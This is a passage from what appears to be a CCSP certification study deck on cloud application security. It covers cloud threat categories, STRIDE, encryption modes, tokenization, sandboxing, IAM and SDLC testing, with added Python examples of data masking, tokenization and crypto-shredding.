• Example: Verizon 2015 Data Breach Investigations Report – “The Shellshock bug in Bash was 2014’s second tumultuous OSS vulnerability event, quickly eclipsing Heartbleed due to many more successful attacks.”
42. 5B-5. ACCOUNT HIJACKING
• Definition: phishing, fraud, and exploitation of software vulnerabilities to obtain credentials and passwords
• Impact: attackers can access critical areas of cloud computing services, allowing them to compromise the confidentiality, integrity, and availability of those services
• Example: In June 2014, Code Spaces’ Amazon AWS account was compromised when it failed to protect the administrative console with multifactor authentication. All the company’s assets were destroyed, putting it out of business.
43. 5B-6. MALICIOUS INSIDERS
• Definition: CERT defines an insider threat as follows: “A malicious insider threat to an organization is a current or former employee, contractor, or other business partner who has or had authorized access to an organization’s network, system, or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems.”
• Impact: a malicious insider can gain increasing levels of access to more critical systems and eventually to data. Systems that depend solely on the CSP for security are at greater risk here.
• Example: Cloud’s Privileged Identity Gap Intensifies Insider Threats – “Organizations need to rein in shared accounts and do a better job tracking user activity across cloud architectures.”
44. 5B-7. ADVANCED PERSISTENT THREATS (APTS)
• Definition: a parasitical form of cyberattack that infiltrates systems to establish a foothold in the computing infrastructure of target companies, from which the attackers smuggle out data and intellectual property. APTs pursue their goals stealthily over extended periods of time. Spearphishing, direct hacking of systems, delivering attack code through USB devices, penetration through partner networks, and use of unsecured or third-party networks are common points of entry for APTs.
• Impact: combatting complex APTs may require more advanced security controls, process management, incident response plans, and IT staff training, which can lead to increased budgets.
• Example: Carbanak: How Would You Have Stopped a $1 Billion APT Attack? – “… Carbanak, an APT attack against financial institutions around the world, may well be considered the largest cyberheist to date. … Unlike the usual cybercriminal method of stealing consumer credentials or compromising individual online banking sessions with malware, the brazen Carbanak gang targeted banks’ internal systems and operations, resulting in a multichannel robbery that averaged $8 million per bank.”
45. 5B-8. DATA LOSS
• Definition: permanent loss of access to data through destruction or loss of the capability to read it (e.g., loss of the encryption key)
• Impact: can affect compliance status or even force a company out of business
• Example: In November 2014, attackers broke into Sony and leaked confidential information such as PII and email exchanges among Sony employees. In the first quarter of 2015, Sony set aside USD $15 million to address ongoing damages from the hack.
46. 5B-9. INSUFFICIENT DUE DILIGENCE
• Definition: an organization that rushes to adopt cloud technologies and chooses CSPs without performing due diligence exposes itself to a myriad of commercial, financial, technical, legal and compliance risks that jeopardize its success.
• Impact: the CSP may not have the same priorities as the customer regarding services; there may be unknown technical issues; data in foreign locations may subject the company to legal redress; security and privacy controls may “disappear”
• Example: M&A – In 2011, Facebook settled FTC charges that it deceived consumers by failing to keep its privacy promises. Under the terms of the FTC’s order, Facebook must get consumers’ affirmative consent before making changes that override their privacy settings, among other requirements.
47. 5B-10. ABUSE AND NEFARIOUS USE OF CLOUD SERVICES
• Definition: malicious actors may leverage cloud computing resources to target users, organizations or other cloud providers. Examples of misuse of cloud service-based resources include launching DDoS attacks, email spam, and phishing campaigns; “mining” for digital currency; large-scale automated click fraud; brute-force compute attacks on stolen credential databases; and hosting of malicious or pirated content.
• Impact: can reduce available capacity, pass increased costs along, and cause business disruption for innocent cloud customers
• Example: The DDoS That Almost Broke the Internet – “The attackers were able to generate more than 300 Gbps of traffic likely with a network of their own that only had access to 1/100th of that amount of traffic themselves.”
48. 5B-11. DENIAL OF SERVICE
• Definition: intended to prevent users of a service from being able to access their data or applications by forcing the targeted cloud service to consume inordinate amounts of finite system resources.
• Impact: experiencing a denial-of-service attack is like being caught in rush-hour traffic gridlock: there is no way to get to your destination, and there is nothing you can do about it except sit and wait.
• Example: Feedly Knocked Offline by DDoS Attack Following Evernote and Deezer Attacks – “In what looks like a series of co-ordinated cyber-attacks by a criminal gang, three major cloud-based services have all been knocked offline in recent days. News aggregator Feedly, note-taking app Evernote and music streaming service Deezer have all come under attack from criminals in the last few days leading to all three suffering service outages.”
49. 5B-12. SHARED TECHNOLOGY ISSUES
• Definition: underlying components (e.g., CPU caches, GPUs, etc.) that comprise the infrastructure supporting cloud services deployment may not have been designed to offer strong isolation properties for a multitenant architecture (IaaS), re-deployable platforms (PaaS) or multicustomer applications (SaaS). This can lead to shared technology vulnerabilities that can potentially be exploited in all delivery models. The key is that a single vulnerability or misconfiguration can lead to a compromise across an entire provider’s cloud.
• Impact: a compromise of shared technology exposes the entire environment to a potential compromise and breach.
• Example: Cross-VM Side Channels and Their Use to Extract Private Keys – “…construction of an access-driven side-channel attack by which a malicious virtual machine (VM) extracts fine-grained information from a victim VM running on the same physical computer.”
50. 5C. QUALITY OF SERVICE
• Ensure you don’t over-control the cloud environment with security measures that degrade the application’s performance
• Examples:
  • Encryption
  • Host-based intrusion detection systems on servers (agents on VMs)
• Only use security controls that are needed and adequate to reduce risk to acceptable levels
51. 5D. THREAT MODELING
• Should be performed when the application design is created
• Goal is to determine any weaknesses in the application before deployment
• STRIDE – system for classifying known threats according to the kind of exploit or the motivation of the attacker:
  • Spoofing – any impersonation, such as IP or user spoofing
  • Tampering – with data output, data input, or data that is stored
  • Repudiation – when the inability to deny one’s actions has been compromised
  • Information disclosure – data leakage or an outright breach
  • Denial of Service – any type of attack that could cause the application to be unavailable, thereby voiding the CIA triangle of security
  • Elevation of Privilege – the ability to elevate a user account’s privilege above the authorized level
52. 6. CLOUD APPLICATION ARCHITECTURE
A. Supplementary Security Devices (e.g., WAF, DAM, XML Firewalls, API Gateway)
B. Cryptography (e.g., TLS, SSL, IPSEC)
C. Sandboxing
D. Application Virtualization
53. 6A. SUPPLEMENTAL SECURITY DEVICES
• Defense in Depth:
  • Firewall – port blocking, unrequested inbound traffic prevention
  • Web application firewall (WAF) – designed to protect specific web-based applications (required by PCI)
  • Database activity monitoring (DAM) – watches databases for unusual requests or activity and sends alerts or takes action to stop it
  • Deception Technology (“Honeypot”) – works in conjunction with WAFs and DAMs, which reroute unusual traffic to the honeypot to capture the attack
  • API gateway – imposes controls on API activity (e.g., access control, connection limits, etc.)
  • XML gateway – works around how sensitive data and services are exposed to APIs, and can implement DLP
54. 6B. CRYPTOGRAPHY
• Data held within and communicated to and between systems and services operating in the cloud should be encrypted
• Encryption modes:
  • Data at rest
    • Whole instance encryption (encrypting the entire storage medium)
    • Volume encryption (encrypting a partition on a hard drive)
    • File or directory encryption (in case the disk or volume is breached)
  • Data in transit
    • Transport Layer Security (TLS) – successor to SSL
    • Secure Sockets Layer (SSL) – deprecated by TLS
    • Virtual Private Network (VPN) – such as an IPSec gateway (encrypted) or MPLS (unencrypted)
  • Data in use
    • Homomorphic encryption (might not be on the CCSP test because this is so new)
55. 6B. CRYPTOGRAPHY (CONT’D)
• Data Masking/Obfuscation
  • Keeps the format of a data string, but alters the content
  • For example, showing only the last four digits of a Social Security number
• Tokenization
  • Generates a token, such as a string of characters, that is used to substitute for sensitive data, which is stored in a secured location (e.g., database)
  • When accessed by a non-authorized entity, only the token string is shown, not the actual data
  • Often used to satisfy PCI DSS requirements for credit card processing
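The masking and tokenization patterns from this slide, as an added example that is not part of the original deck: `mask_ssn` keeps the SSN format and reveals only the last four digits, and the `TokenVault` class (an in-memory stand-in for the secured database the slide mentions) hands out a surrogate for a card number and releases the real value only to an authorized caller. The Luhn check on the token is an added design choice, so that a leaked token cannot be mistaken for a real card number.

```python
import re
import secrets
from typing import Dict


def luhn_valid(digits: str) -> bool:
    """Luhn checksum used by real card numbers (PANs)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:
            n *= 2
            if n > 9:
                n -= 9
        total += n
    return total % 10 == 0


def mask_ssn(ssn: str) -> str:
    """Masking: keep the NNN-NN-NNNN shape, reveal only the last four digits."""
    digits = re.sub(r"\D", "", ssn)
    if len(digits) != 9:
        raise ValueError("expected a 9-digit SSN")
    return "***-**-" + digits[-4:]


class TokenVault:
    """Tokenization: the token circulates in application systems; the real PAN
    stays only in this vault (in-memory stand-in for the secured database)."""

    def __init__(self) -> None:
        self._pan_by_token: Dict[str, str] = {}
        self._token_by_pan: Dict[str, str] = {}

    def tokenize(self, pan: str) -> str:
        digits = re.sub(r"\D", "", pan)
        if not (13 <= len(digits) <= 19) or not luhn_valid(digits):
            raise ValueError("not a well-formed PAN")
        if digits in self._token_by_pan:  # same PAN -> same token (usable as a join key)
            return self._token_by_pan[digits]
        while True:
            # Random digits with the last four preserved for receipts/display.
            # Reject candidates that pass Luhn so a token never looks like a real card.
            body = "".join(secrets.choice("0123456789") for _ in range(len(digits) - 4))
            token = body + digits[-4:]
            if token not in self._pan_by_token and not luhn_valid(token):
                break
        self._pan_by_token[token] = digits
        self._token_by_pan[digits] = token
        return token

    def detokenize(self, token: str, authorized: bool) -> str:
        """Only an authorized caller (e.g. the payment-processor integration) gets the PAN."""
        if not authorized:
            raise PermissionError("caller is not allowed to detokenize")
        return self._pan_by_token[token]
```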
56. 6C. SANDBOXING
• Isolates and utilizes only the intended components
• For example, storing and accessing personal information in one sandbox, and corporate information in another sandbox
• For cloud environments, typically used to run untested or untrusted code in a tightly controlled environment
• Can be used to understand how an application works, or to test applications by executing them and observing the file behavior for indications of malicious activity
57. 6D. APPLICATION VIRTUALIZATION
• Creates a virtual environment for an application to run in
• Goal is to test applications while protecting the OS and other applications
• Examples:
  • Wine (allows a Microsoft application to run on a Linux platform)
  • Microsoft App-V
  • XenApp
• Methods to assess security of virtualized applications:
  • Software assurance
  • Verification and Validation (e.g., Threat Modeling/STRIDE)
58. 7. DESIGN APPROPRIATE IAM SOLUTIONS
• Federated Identity
• Identity Providers
• Single Sign-On
• Multi-factor Authentication
60. 7 (CONT’D). IDENTITY REPOSITORY AND DIRECTORY SERVICES
• Identity repositories provide directory services for the administration of user accounts and their attributes.
• Common Directory Services:
  • X.500 and LDAP
  • Microsoft Active Directory
  • Novell eDirectory
  • Metadata replication and synchronization
  • Directory as a Service
61. 7A. FEDERATED IDENTITY MANAGEMENT
• Provides the policies, processes, and mechanisms that manage identity and trusted access to systems ACROSS ORGANIZATIONS
• Similar to Kerberos, but for separate domains
• Federation Standards:
  • Security Assertion Markup Language (SAML) (most used)
  • WS-Federation (OASIS)
  • OpenID Connect (based on OAuth 2.0)
  • OAuth (for web and mobile applications)
  • Shibboleth (used in the education space)
62. 7B. IDENTITY PROVIDERS
• Federated Identity Providers
  • Identity Provider – holds all the identities and generates a token for known users
  • Relying Party – the service provider who consumes these tokens
63. 7C. SINGLE SIGN-ON
• Single Sign-on
  • For signing in once to many applications within an organization
  • Implemented similarly to on-premises solutions, except on virtual machines rather than physical
• Federated Identity Management/Federated Single Sign-On
  • Used for facilitating interorganizational and intersecurity domain access to resources leveraging federated identity management
64. 7D. MULTIFACTOR AUTHENTICATION
• Also called two-factor authentication or strong authentication
• Users must be able to provide at least two of the following factors:
  • Something they know (e.g., password)
  • Something they have (e.g., display token with random numbers)
  • Something they are (e.g., biometrics such as a fingerprint or retinal scan)
• Includes one-time passwords
• Step-up authentication:
  • Challenge questions
  • Out-of-band authentication (e.g., SMS)
  • Dynamic knowledge-based authentication (questions unique to the end user)
65. REFERENCES
• The Official (ISC)2 Guide to the CCSP CBK, second edition, by Adam Gordon, 2016
• (ISC)2 Certified Cloud Security Professional Official Study Guide, by Brian T. O’Hara and Ben Malisow, 2017
• The Treacherous 12: Cloud Computing Top Threats in 2016, Cloud Security Alliance, February 2016
• The Open Web Application Security Project (OWASP), Top 10 – 2017: The Ten Most Critical Web Application Security Risks
Wine: application virtualization platform that gives a Linux machine the ability to run Windows-based applications
On-premises applications don’t transfer directly to the cloud because:
On-premises apps were not developed with cloud-based services in mind. Often legacy technologies are not supported in the cloud.
Not all apps can be fork-lifted (migrating the entire application the way it runs in a traditional infrastructure, with minimal code changes) to the cloud. Traditional apps are self-contained and have few dependencies, whereas cloud apps have more interdependencies (e.g., virtual environments, supply chain APIs, payment gateways, advertising, etc.).
Many high-end apps are expensive to replace and were developed in legacy code (e.g., COBOL). They are not easy to modify to be cloud-ready.
Developers may not be familiar with technologies that are better used in the cloud (e.g., virtual environments).
Because cloud services are evolving so rapidly, documentation is falling behind.
Integration with cloud services can be complicated; it is best to use the CSP’s APIs.
Need to understand cloud service and deployment models and who is responsible for security controls in each.
Need visibility into who is accessing the application and the actions they are performing (need to get metrics).
Planning and requirements analysis: determine business (functional and non-functional) and security standards, quality assurance requirements, and identification of risks
Defining: define and document product requirements and get customer approval
Designing: specify hardware and system requirements and the overall system architecture; threat modeling and secure design elements are discussed
Developing: divide work into modules or units and start actual coding; conduct code review, unit testing, acceptance testing
Testing: unit testing, integration testing, system testing, and acceptance testing
Maintenance/Secure Operations: goal is to ensure configurations are updated and versioning is consistent; tools include Puppet (enforces configurations) and Chef (stores configurations and updates clients when necessary); activities: dynamic analysis, vulnerability assessments, pen testing, activity monitoring, web app firewalls
Maintenance/Disposal: crypto-shredding (delete the key used to encrypt data stored in the cloud)
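Crypto-shredding as described in the disposal phase above, as an added example that is not part of the original deck: each tenant’s objects are encrypted under a per-tenant key that lives only in the key store, so deleting that key makes every ciphertext still sitting in the cloud bucket unreadable while other tenants are unaffected. The `CloudStore` class and the HMAC-SHA256 counter-mode keystream are constructed for this example (the keystream is a standard-library stand-in for AES-GCM, not a production cipher).

```python
import hashlib
import hmac
import secrets
from typing import Dict


def _keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: HMAC-SHA256 in counter mode as keystream. Stand-in for
    AES-GCM so the example runs with only the standard library; not for production."""
    out = bytearray()
    for block, start in enumerate(range(0, len(data), 32)):
        ks = hmac.new(key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[start:start + 32], ks))
    return bytes(out)


class CloudStore:
    """Ciphertext lives in the (untrusted) cloud bucket; keys live only in the key store.
    Crypto-shredding destroys a tenant's key so every object it encrypted becomes
    unreadable, even though the ciphertext bytes are still in the bucket."""

    def __init__(self) -> None:
        self.bucket: Dict[str, bytes] = {}   # object name -> nonce || ciphertext
        self._owner: Dict[str, str] = {}     # object name -> tenant
        self._keys: Dict[str, bytes] = {}    # tenant -> data encryption key (key store)

    def put(self, tenant: str, name: str, plaintext: bytes) -> None:
        key = self._keys.setdefault(tenant, secrets.token_bytes(32))
        nonce = secrets.token_bytes(12)  # fresh nonce per object, never reused with a key
        self.bucket[name] = nonce + _keystream_xor(key, nonce, plaintext)
        self._owner[name] = tenant

    def get(self, tenant: str, name: str) -> bytes:
        key = self._keys.get(tenant)
        if key is None:
            raise KeyError(f"no key for tenant {tenant!r}: data is cryptographically shredded")
        blob = self.bucket[name]
        return _keystream_xor(key, blob[:12], blob[12:])

    def crypto_shred(self, tenant: str) -> int:
        """Delete the tenant's key; return how many stored objects became unreadable.
        The ciphertext is deliberately left in place: it is now useless without the key."""
        self._keys.pop(tenant, None)
        return sum(1 for owner in self._owner.values() if owner == tenant)
```

Deleting the key is only effective if no copies of it survive elsewhere (backups, key escrow, logs), which is the check to make before relying on this for disposal.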
SAST – the test performs an analysis of the application source code, byte code, and binaries without executing the application code; can be used to find XSS errors, SQL injection, buffer overflows, unhandled error conditions, and potential backdoors
DAST – the tool discovers individual execution paths in the application being analyzed; considered effective when testing exposed HTTP and HTML interfaces
RASP – the runtime environment has full visibility into application logic, configuration, and data and event flows; prevents attacks by self-protecting or reconfiguring automatically without human intervention in response to certain conditions (threats, faults, etc.); currently exists for the Java virtual machine and .NET Common Language Runtime; self-protection measures include user session termination, application termination, and an alert sent to security personnel or the user; an example of a condition that would trigger a response is SQL injection
Vulnerability testing and pen testing – most cloud vendors allow this to be done depending on the service model; SaaS probably won’t allow pen testing
Secure code reviews – formal and informal; should be part of the SDLC